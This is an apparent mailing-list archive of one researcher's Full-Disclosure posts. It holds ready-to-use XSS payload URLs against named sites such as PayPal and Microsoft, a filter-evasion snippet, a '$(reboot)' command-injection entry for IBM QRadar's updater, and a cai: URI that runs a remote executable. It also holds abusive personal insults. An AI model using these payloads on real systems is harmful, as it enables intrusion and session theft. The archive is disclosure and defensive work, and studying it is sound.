[Full-disclosure] ADV: IBM QRadar SIEM

2014-01-24 Thread Thomas Pollet
Hello,

Copy/paste from
http://thomaspollet.blogspot.be/2014/01/ibm-qradar-siem-csrf-xss-mitm-rce.html:

IBM QRadar SIEM CSRF - XSS - MITM - RCE
I have found that the IBM QRadar Security Intelligence Platform auto update
mechanism exposes a number of security bugs.

Web Interface Screenshot (/console/do/qradar/autoupdateConsole)

   - The autoupdateConsole doesn't check for cross site request forgery
   - Input to the autoupdateConsole proxyUsername field is not sanitized,
     therefore it is possible to inject HTML into the web interface
   - The autoupdate mechanism doesn't check SSL certificates before
     downloading the updates
   - The autoupdate mechanism downloads a file scripts/script_list which
     contains a list of files together with their hash. The autoupdate process
     then tries to verify the hash, but in doing so it doesn't escape shell
     characters. This way it is possible to execute commands. For example, the
     appliance will reboot if the script_list contains an entry

       372e25f23b5a8ae33c7ba203412ace30  $(reboot)

   - The autoupdate mechanism runs as root


Regards,
Thomas
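A defender's counterpart to the script_list issue above, as an added example that is not IBM's code: a manifest verifier that hashes files in-process and rejects entries whose names fall outside an allow-list, so an entry like `$(reboot)` is refused before anything could reach a shell. The manifest format is taken from the post; the directory layout, file names and contents are constructed.

```python
"""Shell-free verification of an auto-update manifest in the format the post
describes: one "<32 hex md5>  <relative path>" entry per line, as md5sum prints.
Added example, not IBM's code. The manifest format and the $(reboot) entry are
taken from the post; directory layout, file names and contents are constructed."""
import hashlib
import hmac
import re
import tempfile
from pathlib import Path

# A well-formed manifest line: 32 hex digits, two spaces, the file name.
LINE_RE = re.compile(r"^([0-9a-fA-F]{32})  (.+)$")
# Allow-list for each path component. "$(reboot)", backticks, ';', '|' etc.
# never match, so such names are rejected before they are used for anything.
SAFE_PART_RE = re.compile(r"^[A-Za-z0-9._-]+$")


class ManifestError(ValueError):
    """Raised for malformed, unsafe or non-matching manifest entries."""


def parse_script_list(text):
    """Return [(md5_hex, relative_path)] for a manifest, rejecting anything odd."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ManifestError(f"line {lineno}: malformed entry {line!r}")
        digest, relpath = m.group(1).lower(), m.group(2)
        path = Path(relpath)
        # Reject absolute paths, traversal and any component outside the allow-list.
        if path.is_absolute() or any(
            part in (".", "..") or not SAFE_PART_RE.match(part) for part in path.parts
        ):
            raise ManifestError(f"line {lineno}: unsafe file name {relpath!r}")
        entries.append((digest, relpath))
    return entries


def md5_of_file(path):
    """Hash the file in-process; no `md5sum <name>` is ever handed to a shell."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_update_dir(root, manifest_text):
    """Check every manifest entry against the files under root.

    Returns the verified relative paths; raises ManifestError on a missing file
    or a digest mismatch. MD5 here only detects corruption: authenticity needs a
    signature over the manifest and certificate checking on the download, both
    of which the post says were absent."""
    root = Path(root)
    verified = []
    for digest, relpath in parse_script_list(manifest_text):
        target = root / relpath
        if not target.is_file():
            raise ManifestError(f"missing file {relpath!r}")
        if not hmac.compare_digest(md5_of_file(target), digest):
            raise ManifestError(f"digest mismatch for {relpath!r}")
        verified.append(relpath)
    return verified


def run_demo():
    """Constructed update tree: one good entry plus the post's $(reboot) entry."""
    with tempfile.TemporaryDirectory() as tmp:
        scripts = Path(tmp) / "scripts"
        scripts.mkdir()
        content = b"#!/bin/sh\necho update ok\n"
        (scripts / "update.sh").write_bytes(content)
        good = f"{hashlib.md5(content).hexdigest()}  scripts/update.sh\n"
        bad = "372e25f23b5a8ae33c7ba203412ace30  $(reboot)\n"
        ok = verify_update_dir(tmp, good)
        try:
            verify_update_dir(tmp, good + bad)
            injected = "accepted"
        except ManifestError as e:
            injected = str(e)
    return {"verified": ok, "injected": injected}


if __name__ == "__main__":
    print(run_demo())
```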
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] visiodays

2008-10-15 Thread Thomas Pollet
Hello,

There are huge amounts of memory corruption issues in Visio.
To find them you can use any fuzzer on any vsd file.
To make things easy:
  1)  copy the fuzzed files to your webserver
  2)  attach a debugger to IE
  3)  use the html below.

(Also, running an ActiveX fuzzer on the Visio viewer ActiveX is kinda
entertaining).


  

// The page markup was lost in the archive; the script expects an element with
// id="info" (initially containing the word "text") that shows the current file
// name, and an element named "target" whose src attribute loads the .vsd file.
target.src="Tekening1.vsd"

var count=0;

function next(){
  vsd='bug-'+count+'.vsd';        // fuzzed files are named bug-0.vsd, bug-1.vsd, ...
  count++;
  document.getElementById('info').innerHTML=vsd;
  target.src=vsd;                 // load the next fuzzed file
  setTimeout("next()", 500);      // and move on after 500 ms
}

next();


Regards,
Thomas

Re: [Full-disclosure] xss dot(.) filter evasion

2008-06-19 Thread Thomas Pollet
Hi,

2008/6/19 Andrew Farmer <[EMAIL PROTECTED]>:

> On 18 Jun 08, at 08:49, Thomas Pollet wrote:
>
>> I came across this site that implemented some filtering so the dots were
>> replaced by an underscore, also the quotes and backslash were escaped.
>> I came up with the code below to bypass this filtering (write anything to
>> the page using String.fromCharCode)
>> Someone knows a different way to do this?
>>
>
> eval makes everything easy. Well, reasonably easy.
>
> eval(unescape(String(/%2a%2a%2falert(%22xss%22);%2f%2a%2a/)));
>

The problem was I couldn't call the String class method fromCharCode, as it
would be called by String.fromCharCode, so just using eval didn't really
solve this.
Using with(String) I didn't need to call fromCharCode the way a class method
is normally called.
Thanks for replying though.

Regards,
Thomas Pollet

Re: [Full-disclosure] xss dot(.) filter evasion

2008-06-18 Thread Thomas Pollet
Hello,

so,

with (String) { eval(fromCharCode( /* insert charcodes here */ ) )}

is what I needed

Regards,
Thomas Pollet




[Full-disclosure] xss dot(.) filter evasion

2008-06-18 Thread Thomas Pollet
Hello,

I came across this site that implemented some filtering so the dots were
replaced by an underscore, also the quotes and backslash were escaped.
I came up with the code below to bypass this filtering (write anything to
the page using String.fromCharCode)
Someone knows a different way to do this?

function write(str){
   //document.write() doesn't work as it becomes document_write()
   var s = /write/;
   var w = String();
   var n = String();
   w += s;
   //cast to string so we can index
   w += s;
   n += w[1] + w[2] + w[3] + w[4] + w[5];
   //call document['write']
   document[n](str);
}
var s = /fromCharCode/;
var w = String();
var n = String();
w += s;
n += w[1] + w[2] + w[3] + w[4] + w[5] + w[6] + w[7] + w[8] + w[9] + w[10] + w[11] + w[12];

write(String[n](60,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,119,104,97,116,101,118,101,114,46,99,111,109,34,47,62,104,60,47,97,62));

/*
write(String[n](60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,104,46,99,111,109,34,62));
*/


Regards,
Thomas Pollet

Re: [Full-disclosure] unsubscribing

2008-05-08 Thread Thomas Pollet
Hello,

2008/5/8 poo <[EMAIL PROTECTED]>:
> aw come on thats not true! we need you! without you the secindustry would
> crumble and fall!

Don't be sarcastic on this please. Because Andrew suffers from
borderline disorder, the use of irony in your wording is lost on him.
Andrew, thanks for unsubscribing, you won't be missed. Good luck with
the rest of your life.

Regards,
Thomas Pollet

>
>
>
>
> On Thu, May 8, 2008 at 3:08 PM, n3td3v <[EMAIL PROTECTED]> wrote:
>
> > you've made your point clear, you don't want me around. :(
> >
> > n3td3v
> >
>
>
>
> --
> smile tomorrow will be worse



[Full-disclosure] www.passwordsafe.com

2008-05-05 Thread Thomas Pollet
Hello,

I was reading this blog entry :
http://www.schneier.com/blog/archives/2008/05/the_doghouse_pa.html

I couldn't help but xss them a little.

PoC at:
http://signedness.org/~xz/pwtest.html

You need to be logged in for this to work.
All this can be improved but I'm gonna waste my time somewhere else now.

Regards,
Thomas Pollet

http://thomas.pollet.googlepages.com/



Re: [Full-disclosure] Web Application Security Awareness Day

2008-04-24 Thread Thomas Pollet
Hi,

> Web Application Security Awareness Day was supposed to be the day I
> could shine and the security community could shine, but I don't feel
> like shining anymore.


I'd love to see you burn

Regards,
Tp

[Full-disclosure] Lotus expeditor rcplauncher uri handler vulnerability

2008-04-24 Thread Thomas Pollet
Hello,

I have found that the Lotus Expeditor rcplauncher, as installed by Lotus
Symphony and possibly other products, registers a cai: URI handler.
This handler executes

"D:\Program Files\IBM\Lotus\Symphony\framework\rcp\rcplauncher.exe" -config notes -com.ibm.rcp.portal.app.ui#openCA "%1"

The rcplauncher process accepts various arguments which can be abused to
execute arbitrary code.
The argument to the -launcher option, for example, is an executable that will
be executed.

Malicious URI example:
cai:"%20-launcher%20\\6.6.6.6\d$\trojan

Regards,
Thomas Pollet <http://thomas.pollet.googlepages.com/>

Re: [Full-disclosure] XSS in XChat.org

2008-04-19 Thread Thomas Pollet
http://autotrader.autos.msn.com/fyc/index.jsp?hide_nav=true&page=atcPartner&address=&year=&make=&model=&certified=&distance=25&search_type=both&LNX=MSNATMSNBCCLASSFYC');%7D%7Dalert('n3td3v%20sucks');%20function%20vvv()%7B%20if%20(0==0)%20%7Bvar%20ho=('&icid=autos_msnbc_2&num_records=25&h000=n000'%22%3E/

On 19/04/2008, n3td3v <[EMAIL PROTECTED]> wrote:
>
> On Sat, Apr 19, 2008 at 4:06 AM, Steve Cooperman <[EMAIL PROTECTED]>
> wrote:
> >
> http://xchat.org/cgi-bin/checkupdate.pl?version=2.8.8%22%3E%3Cframe%20src=%22http://youtube.com/watch?v=oHg5SJYRHA0
> >
> >
> >
> > --
> > Love,
> > Steve Cooperman
>
>
> I've noticed an increase in web application stuff on the list since April
> 15th.
> Please only post these on May 1st...
> it will look better if the list is full of xss for one day...and send
> out a bigger message to the powers that be who don't take web
> application security seriously enough.
>
> Btw, I see what you did there with the e-mail address, nice.
>
> All the best,
>
> n3td3v
>
> Web Application Security Awareness Day
> http://lists.grok.org.uk/pipermail/full-disclosure/2008-April/061507.html
>

[Full-disclosure] gallarific backdoored , vulnerable to xss

2008-04-15 Thread Thomas Pollet
Hello,

I was looking at the free version of gallarific, and I found some suspicious
code in the scopbin directory.
Attached is a file I found in the zip I downloaded, in case someone wants to
decode it.

the package can be downloaded from
http://www.gallarific.com/download.php

Also, the software contains several xss flaws:

1) When modifying a user's email address to something like
[EMAIL PROTECTED]">alert(1);
persistent XSS will occur when viewing gadmin/users.php or moderating the
comments in gadmin/comments.php

2) When adding a comment like ">alert(1), XSS will occur
when moderating the comments

3) gallery/tags.php?tag=">alert(1)

4) probably more bugs.

Regards,
Thomas Pollet


Attachment: 911006.php (binary data)

Re: [Full-disclosure] what is this?

2008-01-15 Thread Thomas Pollet
Mr. worthless security,

> stop replying to gadi evron he is a fruit cake.
>
> if we ignore him he will go away.
>
> :)

It didn't work for you, it won't work for G.E.

Regards,
T



Re: [Full-disclosure] NorfolkDesign.com proven track of excellence

2008-01-15 Thread Thomas Pollet
Hello,

My guess is that the following link comes second in a Google search for
norfolkdesign:
http://seclists.org/fulldisclosure/2007/Nov/0295.html
So now Ronnie is trying to SEO-spam FD.

Regards,
Thomas Pollet

p.s. Ronnie, thanks for the spam, I apologize for linking to Norfolkdesign
(http://seclists.org/fulldisclosure/2007/Nov/0295.html) (lol)

On 15/01/2008, Dixon, Wayne <[EMAIL PROTECTED]> wrote:
>
>  That's great that Norfolk design is charitable, but what does that have
> to do with Full Disclosure?  Is there a breach of data or something?  What?
>
> Wayne
>
>  -Original Message-
> *From:* [EMAIL PROTECTED] [mailto:
> [EMAIL PROTECTED] *On Behalf Of *Ronnie - Norfolk
> Design
> *Sent:* Tuesday, January 15, 2008 4:34 PM
> *To:* full-disclosure@lists.grok.org.uk
> *Subject:* [Full-disclosure] NorfolkDesign.com proven track of excellence
>
>  Norfolk Design has a proven track record for excellence in its area.  Our
> clients' testimonials reflect this.
>
>
>
> Working alongside Norfolk Design, we have seen many small and struggling
> charities, grow and flourish.  We believe having a web-presence is very
> important for any charity to get their message across and drum-up as much
> support as possible.  Having a web-presence means charities have the
> potential to reach a global audience.
>
>
>
> Norfolk Design understands that charities are often on a very tight budget
> and so we continually ensure we provide offer the best possible value for
> money – often going that extra mile at no extra cost to the client.
>
> Kindest regards
>
> *Ronnie Zahdeh*
> Norfolk Design
> *Limits are in the mind, not on the web.*
>
> *E-mail: [EMAIL PROTECTED]
> *Website:* http://www.norfolkdesign.com
>
> The information contained in this email is sent from Norfolk Design and is
> intended to the addressed recipient(s) only. The content is confidential and
> privileged. If you are not the intended recipient please be aware that any
> disclosure, copying, distribution or use of the contents is prohibited and
> could be considered illegal. If you have received this electronic message in
> error, please accept our apologies, notify us immediately, and delete the
> message. It is important to note that this email may contain views which are
> the opinion of Norfolk Design.
>
> All email sent from Norfolk Design is scanned using both client-side and
> server-side multiple virus scanners using Norfolk Design's own servers. We
> take every measure possible to ensure our emails do not contain any viruses,
> but please note that we do not take responsibility if this eventuality
> occurs. It is your responsibility to ensure all emails you receive from
> Norfolk Design, are scanned with your own virus protection software.
>

Re: [Full-disclosure] Javascript

2008-01-14 Thread Thomas Pollet
Hello,

FYI: I found the SiteCatalyst software running on paypal.com to be
vulnerable to XSS in the past (the unfiltered Referer URL was used as a
JavaScript value). Omniture/PayPal didn't respond to my emails; PayPal
fixed the issue after public disclosure.

Regards,
Thomas Pollet

On 14/01/2008, Michael Holstein <[EMAIL PROTECTED]> wrote:
>
> > This is from a current CNN home page:
> >
> > /* SiteCatalyst code version: H.10.
> > Copyright 1997-2007 Omniture, Inc. More info available at
> > http://www.omniture.com */
>
> Omniture is one of (many) sites that do tracking for companies .. like
> what your mouse moves over, how long it stays there, how long you view
> each page, etc. etc.
>
> This is why you should disable javascript for any site you don't
> explicitly trust (FYI: by default, NoScript for Firefox allows *msn.com
> *google.com, and a bunch of other stuff you probably don't want).
>


Re: [Full-disclosure] Does this exist ?

2007-07-06 Thread Thomas Pollet
Hello,

A similar technique has been discussed here:
http://www.schneier.com/blog/archives/2007/06/perpetual_dogho.html

("The key is not transferred but is instead created from a file of any
size that is available on both a computer used to send a secure
message and a computer used to receive a secure message.")

Regards,
Thomas Pollet

On 05/07/07, Dan Becker <[EMAIL PROTECTED]> wrote:
>
> I have an idea that won't leave me alone and this list seems to have
> the most potential for knowing if the idea exists. My apologies for a
> somewhat offtopic post.
>
> Would there be a way to create a  rainbow table of tcp packets to be
> used to generate one packet for every 1000 or so normal packets simply
> by matching hashes with databases on both ends ?
>
> One could use this for crypto or simply traffic reduction over latent
> networks such as satellites.
>


[Full-disclosure] Aventail Connect SSL VPN Client Buffer Overflow

2007-04-30 Thread Thomas Pollet

Hello,

Aventail Connect registers a layered service provider to handle DNS queries.
When resolving a hostname the software fails to check string boundaries
properly.
As the LSP intercepts all ws2_32 DNS lookups, every application performing
these operations is vulnerable.

e.g.

$ ssh $(perl -e 'print "a"x2200')
Segmentation fault (core dumped)

vulnerable copy loop in asnsp.dll:

18B539F2   41            INC ECX
18B539F3   41            INC ECX
18B539F4   66:85D2       TEST DX,DX
18B539F7   74 0A         JE SHORT asnsp.18B53A03
18B539F9   66:8B11       MOV DX,WORD PTR DS:[ECX]
18B539FC   66:8916       MOV WORD PTR DS:[ESI],DX
18B539FF   46            INC ESI
18B53A00   46            INC ESI
18B53A01  ^EB EF         JMP SHORT asnsp.18B539F2

This was tested on version 4.1.2.13.
vendor: http://www.aventail.com/

Regards,
Thomas Pollet

Re: [Full-disclosure] UK ISP threatens security researcher

2007-04-18 Thread Thomas Pollet

Dear mr. Dr. Neal Krawetz, PhD,

On 18/04/07, Dr. Neal Krawetz, PhD <[EMAIL PROTECTED]> wrote:
> Let's keep in mind that publishing most security information
> borders extortion.  There isn't any other industry where fat nerds
> try to strongarm large corporations into admitting there are
> weaknesses in their products, defaming them publicly, causing their
> stock prices to fall, or otherwise damaging their public image and
> thus causing financial damage, et cetera.

Pretty cool, huh?

> Gadi, I doubt your people would be thrilled if you tried to
> petition Yahweh with complaints regarding His children being
> vulnerable to pieces of metal fired at high velocity from guns, and
> demanding that if things aren't fixed within what you consider a
> satisfactory timeframe (which, in the end is just some arbitrary
> number invented by people with no concept of industry and
> economics) that you will arm every man, woman, child, and lizard of
> bordering Arabic nations to Israel in order to teach that big guy
> up in the sky a lesson about not making humans impervious to
> gunfire!

Your analogies are flawed. I'm not going to elaborate on this.

> Come on man!  You're smarter than this!  When socially inept people
> who possess only rudimentary computer skills start bullying (call
> it what you will, in the end if you argue against my points you
> clearly are one of those people who can't make it in the real
> world) corporations for fame and money, which have real-world
> financial consequences to said corporate entities, you are in the
> least committing extortion.  And while you might think these
> efforts are noble, the reality of the situation is simple - this is
> absolutely no different than a bunch of Russians with botnets,
> forcing businesses to comply with their demands if that business
> wishes to continue existing on the Internet.

So what about you? You enrolled in some university, then X years of
conformism later you "made" it in "the real world"? I bet your mom is proud
of you.

> When was the last time an auto manufacturer was humiliated publicly
> because their car windows can easily be broken and contents of the
> car stolen?  When have chain manufacturers been chastised by the
> mass media for the existence of bolt cutters?  What about the
> serious threat of hacksaws?
>
> People, grow up.  If your life is spent behind a computer
> discovering uninteresting oversights in software design, where you
> clearly lack experience and ability, and proclaiming yourself the
> #chatzone badass and drolling saying "I'm the best evah!!!" doesn't
> make you important.  The sad state of this industry is that there
> are enough ignorant people that find it impressive, and who don't
> understand the ramifications of their publicity whoring and the
> obvious parallels to other industries.
>
> The long and short of it is:
>
>   If you want to act like a criminal, be prepared to be treated
> like a criminal, and don't cry about the choices you've made in
> life.  You aren't a fucking martyr when your motivations and cause
> are only self-promoting and otherwise selfish.

The motivations of major corporations are any better? What are their
motivations again, ah right, ROI, TBD, BAU. QoS and customer satisfaction
isn't that high on the priority list if it's not related to the bucks.

> Always remember the embarrassment to hackers, humans, and Hebrews
> everywhere that is Kevin Mitnick.

What ethnic groups are ashamed by you? Prolly not the mba'ers or the
marketing department, they love people like you!

> - - Dr. Neal Krawetz, PhD
> http://www.hackerfactor.com/blog/
>
> On Tue, 17 Apr 2007 19:30:54 -0400 Gadi Evron <[EMAIL PROTECTED]>
> wrote:
> >http://www.theregister.com/2007/04/17/hackers_service_terminated/
> >
> >"A 21-year-old college student in London had his internet service
> >terminated and was threatened with legal action after publishing
> >details of a critical vulnerability that can compromise the security of
> >the ISP's subscribers."
> >
> >I happen to know the guy, and I am saddened by this.
> >
> >   Gadi.


Re: [Full-disclosure] windows vulnerability? [was: Re: [Code-Crunchers] 137 bytes]

2006-11-08 Thread Thomas Pollet
Hello,

On 08/11/06, Gadi Evron <[EMAIL PROTECTED]> wrote:
> On Wed, 8 Nov 2006, onisan wrote:
> > One thing is in this makes it even more interesting, most of the firewalls
> > do not block this download, so it's smallest and most dangerous downloader
> > at the same time :o
>
> What Alex did is very impressive! Matthew Murphy came up with the idea
> originally, I think, but it doesn't take from this amazing work in any
> way.
>
> *awe struck*
>
> I'd say more though, it's a vulnerability.
> If you can load a library remotely, and do so with no problems, it's a
> vulnerability in Windows. I am not sure of what kind quite yet.

Windows handles UNC paths the same way as local paths. Another mechanism used
to load a remote dll using a UNC path is described in
http://opensores.thebunker.net/pub/mirrors/blackhat/presentations/win-usa-04/bh-win-04-litchfield/bh-win-04-litchfield.pdf
Here the "system" directory is overwritten with a (UNC) directory owned by
the attacker. When GetSystemDirectoryW() is called to load faultrep.dll on an
exception, an attacker can supply his backdoored faultrep.dll. I don't think
you should classify this as a vulnerability, it's known Windows behaviour
(yet, Windows, a vulnerability all by itself?).

Regards,
Thomas

> The mother of all downloaders.
>
> "The Zone has a new King!" -- Jeff, Coupling (BBC, UK).
>
> Gadi.
>
> > -- G
> >
> > 2006/11/8, Solar Eclipse <[EMAIL PROTECTED]>:
> > >
> > > On Tue, Nov 07, 2006 at 10:56:42AM -0800, Peter Ferrie wrote:
> > > > Why is the idata size present?  AFAIK, no Windows version checks it.
> > > > Four bytes shorter, then (stop at the idata rva non-zero byte)?
> > >
> > > You're right, you can remove the last field and bring the file size down
> > > to 133 bytes. That's what I get for claiming that the size can't be
> > > improved :-)
> > >
> > > Solar


Re: [Full-disclosure] Live is Live

2006-09-22 Thread Thomas Pollet
On 20/09/06, c0ntex <[EMAIL PROTECTED]> wrote:
> Nothing new, been flawed for ever and shall remain so until the end of time  :-)

I have to second this...
http://soapbox.msn.com/betaplayer.aspx?vid=c1b72697-d9aa-41eb-a72f-a71812096b8e&wa=wsignin1.0&'+alert(1)+'
http://open-security.org/msn.JPG

> On 20/09/06, bluepill <[EMAIL PROTECTED]> wrote:
> >
> > http://www.live.com/?%3Ci%3E
> >
> > Oh my.
> >
> > Luckily this company doesn't produce anything people need to rely on in
> > terms of security, such as... an OS, a database, a web server, a
> > distributed online authentication system or something.
>
> --
> regards
> c0ntex

Re: [Full-disclosure] Re: Re: George Bush appoints a 9 year old to be the chairperson of the Information Security Deportment

2006-08-30 Thread Thomas Pollet
utdallas alumni page
http://utdallas.edu/siteindex/index.php?id=%3Cimg%20src=http://news.bbc.co.uk/olmedia/159/images/_1591076_osama_300.jpg%3E

Better get back to work instead of evangelizing the new world order.

Greets,
Thomas

Re: [Full-disclosure] further to the XSS flaw in eEye by Valerie Marchuk

2006-08-21 Thread Thomas Pollet
On 21/08/06, Alan Shimel <[EMAIL PROTECTED]> wrote:
> I posted further today to the XSS flaw found in the eEye web
> site with quotes from the eEye CEO.
>
> You can read it here:
> http://www.stillsecureafteralltheseyears.com/ashimmy/2006/08/but_if_doesnt_b.html
>
> Would welcome comments on whether you think it is harmless
> or not?

Mostly harmless, just a sign of decay/bad security engineering practices.
Some sites _do_ know how to provide secure webservices.

For the record:
http://boards.live.com/Travelboards/board.aspx?BoardID=144&y000=%20--%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
http://movies.msn.com/movies/genre.aspx?genre=Comedy&');alert('xss

Greets,
Thomas

[Full-disclosure] Re: apple.com xss

2006-08-11 Thread Thomas Pollet
http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl?q=-->+mac+<script>alert(1)script>&output=xml_no_dtd&client=default_frontend&site=us_only&lr=lang_en&sort=&start=&access=p&oe=utf-8

On 11/08/06, Thomas Pollet <[EMAIL PROTECTED]> wrote:
> apple.com search form xss ( POST var )--> mac alert(1)



[Full-disclosure] apple.com xss

2006-08-11 Thread Thomas Pollet
apple.com search form xss ( POST var )--> mac alert(1)

[Full-disclosure] msn.com xss

2006-08-11 Thread Thomas Pollet
http://my.msn.com/newmodule.armx?tab=1&tok=phUDAgZEgN/xhXawy4jZMg';alert(1);r.p='==&page=1&col=0


[Full-disclosure] live.com xss

2006-08-11 Thread Thomas Pollet
http://boards.live.com/Travelboards/search.aspx?search=\";-->alert(1)

Re: [Full-disclosure] Re: micosoft.com xss

2006-08-08 Thread Thomas Pollet
Painfully obvious, yet I did pwn about every megacorp on the block :p

On 08/08/06, Mad World <[EMAIL PROTECTED]> wrote:
> For such a words you could eat your hat if I would like to go in public.
> It's a last time I am teaching script kiddies for something beyond their
> understanding.
> I would like that you have at least small area in your brains that
> restricts your tongue.
> If you wouldn't be script kiddie you would take your words back and learn
> instead.
>
> Yesterday's code is here:

[Full-disclosure] paypal.com xss (was Re: micosoft.com xss)

2006-08-08 Thread Thomas Pollet
Man you suck, codes or stfu.

I know the code is broken in more than 1 place, I tried registering event
handlers, exiting jscript etc. etc. Time to move on.
Point is: XSS is everywhere, trust no one etc. etc.

To make my point clear... last of the [EMAIL PROTECTED]

GET https://www.paypal.com/cgi-bin/webscr?cmd=_registration-run HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
Referer: https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&source_page=_profile-comparison";alert("xss");var%20f="

results in

<!--
/* SiteCatalyst Variables */
s.pageName="SignUp:Landing Page";
s.prop11="general/SignupInitial.xsl::_registration-run::0";
s.channel="Sign Up:Landing Page";
s.r="https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&amp;source_page=_profile-comparison";alert("xss");var%20f="";
s.prop7="Unknown";
s.prop8="Unknown";
s.prop9="Unknown";
s.prop10="US";
s.prop12="Unknown";
s.visitorSampling="20";
/* DO NOT ALTER ANYTHING BELOW THIS LINE ! **/
var s_code=s.t();if(s_code)document.write(s_code) // -->

In other words, the Referer URL isn't correctly cleaned for the PayPal
registration page and is used for a JS var.

PoC: go to
https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&source_page=_profile-comparison";alert("xss");s.r="
and click on the sign up link.

Have a nice life, die soon,
Thomas

On 08/08/06, Mad World <[EMAIL PROTECTED]> wrote:
> Good morning !
> You can doubt, it's your right to do so.
> Wanna bet ?
> Just open your eyes and your nose will show you that you are actually
> breaking silly structure of page in more than one place ..
> It's relatively easy using the same exact place of code you tried to make it.
> I have working example, it is based on other microsoft "features" as well.
>
> Greets,
> - Mad World
>
> --- [EMAIL PROTECTED] wrote:
> From: "Thomas Pollet" <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Re: micosoft.com xss
> Date: Tue, 8 Aug 2006 10:18:56 +0200
>
> > On 08/08/06, Mad World <[EMAIL PROTECTED]> wrote:
> > > Why do you need it ?  You already discovered xss, the rest of "job" is
> > > just matter of technique.
> > > I think majority of xss submitters here could do it by various means.
> > > M$ is lost in its own complexity of how to do simple things.
> > > If you could ever give me reasonable answer for why do you need this
> > > $hit - I could give you the "rest", like others could.
> >
> > I doubt you actually tried getting js executed on page load (for some
> > reason they try to prevent xss in a number of ways).
> > I did try and didn't succeed, that's why I ask.
> >
> > Greets,
> > Thomas
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
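The paypal post above shows the classic shape of this bug: a Referer value spliced raw between two quotes of a JavaScript string inside an inline script. The block below is an added example, not code from the post or from PayPal, contrasting that pattern with encoding the value for the JavaScript-string-inside-HTML context. The names `jsStringLiteral`, `renderUnsafe`, `renderSafe`, `evaluateSnippet` and `demo` and the constructed marker payload (same shape as the post's `";alert("xss");var f="`, but it sets a flag instead of calling alert) are assumptions of this example.

```javascript
// Added example (not from the post): embedding an attacker-controlled value,
// here a Referer header, into an inline <script> variable such as s.r="...".

// Serialize a value as a JavaScript string literal that is also safe to place
// inside an HTML <script> block: JSON.stringify handles quotes, backslashes
// and control characters; the extra escapes keep "</script>" and comment
// markers from being seen by the HTML parser, and neutralise the two line
// terminators that JSON permits unescaped but JS treats as line breaks.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// The pattern the post describes: the raw header lands between two quotes.
function renderUnsafe(referer) {
  return 's.r="' + referer + '";';
}

// Hardened form: the value is serialised for the JS-string context.
function renderSafe(referer) {
  return 's.r=' + jsStringLiteral(referer) + ';';
}

// Run a rendered snippet in its own scope, as a <script> block would, with a
// fresh SiteCatalyst-like object `s`, and return that object for inspection.
function evaluateSnippet(snippet) {
  const s = {};
  new Function('s', snippet)(s);
  return s;
}

// Constructed payload (assumption of this example) with the same shape as
// the post's ";alert("xss");var f=" but setting a flag instead of alert().
const MARKER_PAYLOAD = '";s.injected=true;var f="';

// Returns { unsafe, safe }: true where the payload escaped the string literal
// and ran as code, false where it stayed a plain string value.
function demo() {
  return {
    unsafe: evaluateSnippet(renderUnsafe(MARKER_PAYLOAD)).injected === true,
    safe: evaluateSnippet(renderSafe(MARKER_PAYLOAD)).injected === true,
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderUnsafe(MARKER_PAYLOAD));
  console.log(renderSafe(MARKER_PAYLOAD));
  console.log(demo()); // { unsafe: true, safe: false }
}
```

The point of the extra `<`, `>` and `&` escapes is that the HTML parser runs before the JavaScript parser: a string that is a perfectly valid JS literal can still end the `<script>` element early if it contains `</script>`, so the value has to be safe for both parsers at once.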

[Full-disclosure] microsoft.com xss #2

2006-08-08 Thread Thomas Pollet
Hello,
for what it's worth..

http://forums.microsoft.com/MSDN/Search/Search.aspx?words=ms&localechoice=9&SiteID=1&searchscope='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&ForumID=45

Greets,
Thomas
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: micosoft.com xss

2006-08-08 Thread Thomas Pollet
On 08/08/06, Mad World <[EMAIL PROTECTED]> wrote:
Why do you need it ?
You already discovered xss, the rest of "job" is just matter of technique.
I think majority of xss submitters here could do it by various means.
M$ is lost in its own complexity of how to do simple things.
If you could ever give me reasonable answer for why do you need this $hit - I could give you the "rest", like others could.
I doubt you actually tried getting js executed on page load (for some reason they try to prevent xss in a number of ways).

I did try and didn't succeed, that's why I ask.
Greets,
Thomas
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] micosoft.com xss

2006-08-07 Thread Thomas Pollet
Hello,
I have found that microsoft.com fails to filter html properly on some pages.

http://support.microsoft.com/newsgroups/default.aspx?lang=en&cr=US&dg=microsoft.public.ccf&sloc=us');alert('xss

this causes javascript to be executed when a user clicks the help link.
Someone knows how to get js executed on page load?

greets,
Thomas

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] security vendor xss

2006-08-07 Thread Thomas Pollet
Hello,
several security vendors still don't know how to filter html in their custom search engines.

